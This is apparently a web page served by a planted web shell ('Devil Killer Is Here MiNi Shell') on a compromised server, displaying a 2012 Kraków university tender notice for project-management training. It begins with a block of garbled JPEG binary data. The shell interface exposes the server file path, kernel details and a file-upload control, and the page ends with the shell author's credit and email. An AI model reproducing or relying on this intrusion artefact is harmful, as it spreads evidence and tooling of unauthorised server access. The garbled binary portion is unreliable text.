JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121019/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121019/222465-N-2012.html

<p class="kh_header"><b>Kraków: Przeprowadzenie  szkolenia z zakresu zarządzania projektami dostosowanymi do kierunków prowadzonych na Wydziale Inżynierii Środowiska Politechniki Krakowskiej, tj. Inżynieria Środowiska, Ochrona Środowiska,  Budownictwo</b><br>
<b>Numer ogłoszenia: 222465 - 2012; data zamieszczenia: 19.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika Krakowska im. Tadeusza Kościuszki Dział Zamówień Publicznych , ul. Warszawska 24, 31-155 Kraków, woj. małopolskie, tel. 12 628 26 56; 628 22 20, faks 12 6282072.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pk.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie  szkolenia z zakresu zarządzania projektami dostosowanymi do kierunków prowadzonych na Wydziale Inżynierii Środowiska Politechniki Krakowskiej, tj. Inżynieria Środowiska, Ochrona Środowiska,  Budownictwo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie szkolenia z zakresu zarządzania projektami dostosowanymi do kierunków prowadzonych na Wydziale Inżynierii Środowiska Politechniki Krakowskiej, tj. Inżynieria Środowiska, Ochrona Środowiska, Budownictwo. 1). Szkolenie powinno być prowadzone przez praktyków zatrudnionych w przedsiębiorstwach branżowych tj. inżynieria środowiska, ochrona środowiska, budownictwo. 2). Szkolenie odbywać się będzie w semestrze zimowym rok akademicki 2012-2013 - studenci III roku studiów inżynierskich stacjonarnych kierunki: Inżynieria Środowiska, Ochrona Środowiska, Budownictwo - 15 grup oraz w semestrze zimowym rok akademicki 2013-2014 - studenci III roku studiów inżynierskich stacjonarnych kierunki: Ochrona Środowiska, Budownictwo - 8 grup, na każdą grupę w poszczególnym roku akademickim 30 godzin dydaktycznych szkolenia. 3). Ilość osób biorących udział w szkoleniu: - w roku akademickim 2012-2013 około 450 osoby, - w roku akademickim 2013-2014 około 220 osób. W sumie 690 godzin szkolenia dla około 670 studentów w ramach projektu współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. 4). Wykonawca przygotuje materiały szkoleniowo-dydaktyczne dla uczestników. 5). Szkolenia będą odbywać się w salach Politechniki Krakowskiej z wyjątkiem wizyt studyjnych oraz zajęć praktycznych (10 godzin lekcyjnych) - w miejscach wskazanych przez Wykonawcę. 6). Wykonawca na czas wizyt studyjnych dokona ubezpieczenia studentów od NNW. 7). Wykonawca zapewni odzież ochronną dla studentów podczas wizyt studyjnych. 8). Szkolenie będzie dostosowane do harmonogramu zajęć studentów. 9). Wykonawca powinien przeprowadzić na początku test sprawdzający poziom wiedzy z zakresu objętego przedmiotem zamówienia, dostarczyć go w formie papierowej (wyniki wg listy oraz testy wypełnione przez studentów) i elektronicznej do Zamawiającego. Liczba pytań na teście min. 10, max. 30. 10). Wykonawca powinien przeprowadzić ten sam test na zakończenie szkolenia, dostarczyć go w formie papierowej (wyniki wg listy oraz testy wypełnione przez studentów) i elektronicznej do Zamawiającego. 11). Wykonawca zobowiązany będzie do sporządzania miesięcznych raportów frekwencji uczestników szkolenia, prowadzenia dokumentacji szkoleniowej: dziennika szkolenia zawierającego tematykę poszczególnych spotkań, materiały szkoleniowe, listy obecności, listy potwierdzające odbiór materiałów dydaktycznych oraz odbiór certyfikatu dla każdej grupy oddzielnie, wykonania zdjęć dokumentujących wizyty studyjne oraz własnych kart pracy. 12). Wykonawca zobowiązuje się do przygotowania w ramach umowy i zamieszczenia we wszystkich materiałach dydaktycznych, informacji o współfinansowaniu przez Unię Europejską w ramach Europejskiego Funduszu Społecznego oraz symboli (logo) Programu Operacyjnego Kapitał Ludzki oraz Unii Europejskiej, zgodnie z aktualnymi Wytycznymi dotyczącymi oznaczania projektów w ramach Projektu Operacyjnego Kapitał Ludzki oraz do informowania uczestników o współfinansowaniu projektu ze środków EFS. 13). Wykonawca zapewni transport dla studentów w przypadku realizacji wizyt studyjnych, zajęć praktycznych poza miastem Kraków. 14). Zamawiający dokona płatności za wykonaną usługę po zakończeniu danego semestru i dostarczeniu do Zamawiającego wymaganej dokumentacji szkoleniowej: listy obecności, raporty frekwencji, materiały szkoleniowe, testy przeprowadzone na początku i końcu szkolenia w formie papierowej (wyniki wg listy oraz testy wypełnione przez studentów) i elektronicznej, zdjęcia dokumentujące każdą wizytę studyjną, listy potwierdzające odbiór certyfikatu oraz materiałów dydaktycznych, ksera ubezpieczenia NNW studentów wraz z listą studentów, kart pracy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.43.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca biorący udział w postępowaniu musi wykazać, że dysponuje  osobami zdolnymi do wykonania zamówienia posiadającymi kwalifikacje i doświadczenie w poniższym zakresie:
Zadanie  częściowe nr 1 
Wykonawca biorący udział w postępowaniu musi wykazać, że dysponuje co najmniej dwoma osobami fizycznymi, które posiadają następujące kwalifikacje i doświadczenie zawodowe:
1).	Wykształcenie wyższe techniczne lub ekonomiczne .
2).	Minimum 3 letnie doświadczenie praktyczne w zarządzaniu inwestycyjnymi projektami związanymi z inżynierią lub ochroną środowiska w branżach -inżynieria środowiska i ochrona środowiska, 
3).	Realizacja min 3 projektów inwestycyjnych na stanowisku kierowniczym w branży inżynieria środowiska i ochrona środowiska.
4).	Znajomość krajowych branżowych przepisów prawnych oraz międzynarodowych w zakresie zarządzania projektami inwestycyjnymi.
Zadanie częściowe nr 2
Wykonawca biorący udział w postępowaniu musi wykazać, że dysponuje co najmniej dwoma osobami fizycznymi, które posiadają następujące kwalifikacje i doświadczenie zawodowe:
1).	Wykształcenie wyższe techniczne lub ekonomiczne.
2).	Minimum 3 letnie doświadczenie praktyczne w zarządzaniu inwestycyjnymi projektami budowlanymi w branży budowlanej. 
3).	Realizacja min 3 projektów inwestycyjnych na stanowisku kierowniczym w branży budowlanej.
4).	Znajomość krajowych branżowych przepisów prawnych oraz międzynarodowych w zakresie zarządzania projektami.
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia na podstawie przedstawionego przez Wykonawcę Wykazu osób - sporządzonego zgodnie z Załącznikiem nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty - załącznik nr 1 do SIWZ Opcjonalnie, jeśli występuje pełnomocnik - pełnomocnictwo (w oryginale lub notarialnie potwierdzonej kopii) dla osoby reprezentującej w niniejszym postępowaniu Wykonawcę lub pełnomocnictwo dla osoby lub podmiotu reprezentującego kilku Wykonawców składających ofertę wspólną</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany niniejszej umowy wymagają zgody stron w formie pisemnej pod rygorem nieważności.
2.	Zamawiający dopuszcza możliwość zmian treści zawartej umowy w następujących okolicznościach:
a)	gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia;
b)	gdy konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych  w umowach pomiędzy Zamawiającym a Instytucją Pośredniczącą,
c)	gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki lub wytycznych i zaleceń Instytucji Zarządzającej 	
d)	gdy wystąpią obiektywne przeszkody uniemożliwiające realizację zamówienia              lub osiągnięcie jego celów według pierwotnie przyjętego harmonogramu realizacji   
       zamówienia. 
e)	Osób przewidzianych do realizacji zamówienia przez Strony w przypadku nieprzewidzianych zdarzeń losowych min. takich jak: śmierć, choroba, ustanie stosunku pracy, pod warunkiem, że osoby zaproponowane będą posiadały takie same kwalifikacje jak osoby wskazane w umowie.
3.	Zmiany przewidziane w umowie mogą być inicjowane przez Zamawiającego oraz przez Wykonawcę.
4.	Warunkiem dokonania zmian w umowie jest złożenie wniosku przez stronę inicjującą zamianę zawierającego: opis propozycji zmian, uzasadnienie zmian, opis wypływu zmiany na termin wykonania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pk.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego pokój nr 110, budynek W-9, ul. Warszawska 24, 31-155 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.10.2012 godzina 09:30, miejsce: w siedzibie Zamawiającego pokój nr 110, budynek W-9, ul. Warszawska 24, 31-155 Kraków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt   Wzrost liczby absolwentów Wydziału Inżynierii Środowiska Politechniki Krakowskiej zdolnych do wykorzystania wiedzy w kreowaniu rozwoju spełniającego wymagania środowiskowe  współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przedmiotem zamówienia jest przeprowadzenie szkolenia z zakresu zarządzania projektami dostosowanymi  do  kierunków   Inżynieria Środowiska i Ochrona Środowiska prowadzonych  na Wydziale Inżynierii Środowiska Politechniki Krakowskiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymiar czasu szkolenia: 30 godzin, w tym 10 godzin wizyt studyjnych na terenie budowy lub na terenie inwestycji zakończonych lub w biurach projektowych. Zakres tematyczny: 1). Podstawowe definicje i zakres zarządzania projektem, w tym realizacja inwestycji (wyjaśnienie pojęć, etapy realizacji projektu, wymagania, podział prac i obowiązków w projekcie, odpowiedzialność, monitoring i ocena efektów); 2). Wymogi prawne w realizacji projektów inwestycyjnych (etapy i zakres dokumentacji, przepisy prawne, prawo wodne, prawo o ochronie środowiska i inne pokrewne) oraz wymagania i kryteria międzynarodowe w przygotowaniu dokumentacji pod kątem finansowania realizacji projektów ze środków zagranicznych; 3). Planowanie przedsięwzięć, w tym wymagania kosztowe; 4). Zarządzanie realizacją projektów - modele zarządzania i realizacji, plan i harmonogram, delegowanie zadań, ryzyka, kontrola jakości i terminowości, konsultacje społeczne, raportowanie; 5). Komunikacja w projekcie - zarządzanie potencjałem osobowym, modele zarządzania odpowiedzialność, techniki motywacyjne; 6). Kontakty ze stronami; 7). Zakończenie projektu - zasady zamykania projektu i jego etapów, raportowanie, dokumentacja powykonawcza; 8). Studia przypadku - ćwiczenia indywidualne i grupowe, analiza dokumentacji projektowej, wykonawczej i powykonawczej; 9). Wizyty studyjne na terenie, inwestycji zakończonych, w biurach planistycznych i projektowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.43.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiotem zamówienia jest przeprowadzenie szkolenia z zakresu zarządzania projektami dostosowanymi do  kierunku Budownictwa prowadzonego na Wydziale Inżynierii Środowiska Politechniki Krakowskiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymiar czasu szkolenia: 30 godzin, w tym 10 godzin wizyt studyjnych na terenie budowy, lub na terenie inwestycji zakończonych lub w biurach projektowych. Zakres tematyczny: 1). Podstawowe definicje i zakres Zarządzania Projektem, w tym realizacja inwestycji (wyjaśnienie pojęć, etapy realizacji projektu, wymagania, podział prac i obowiązków w projekcie, odpowiedzialność, monitoring i ocena efektów); 2). Wymogi prawne w realizacji projektów budowlanych (etapy i zakres dokumentacji, prawo budowlane, prawo wodne, prawo o ochronie środowiska i inne pokrewne) oraz wymagania i kryteria międzynarodowe w przygotowaniu dokumentacji pod kątem finansowania realizacji projektów ze środków zagranicznych; 3). Planowanie przedsięwzięć, w tym wymagania kosztowe; 4). Zarządzanie realizacją projektów - modele zarządzania i realizacji, plan i harmonogram, delegowanie zadań, ryzyka, kontrola jakości i terminowości, konsultacje społeczne, raportowanie; 5). Komunikacja w projekcie - zarządzanie potencjałem osobowym, modele zarządzania odpowiedzialność, techniki motywacyjne; 6). Kontakty ze stronami; 7). Zakończenie projektu - zasady zamykania projektu i jego etapów, raportowanie, dokumentacja powykonawcza; 8). Studia przypadku - ćwiczenia indywidualne i grupowe, analiza dokumentacji projektowej, wykonawczej i powykonawczej; 9). Wizyty studyjne na terenie budowy, inwestycji zakończonych, w biurach planistycznych i projektowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.43.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com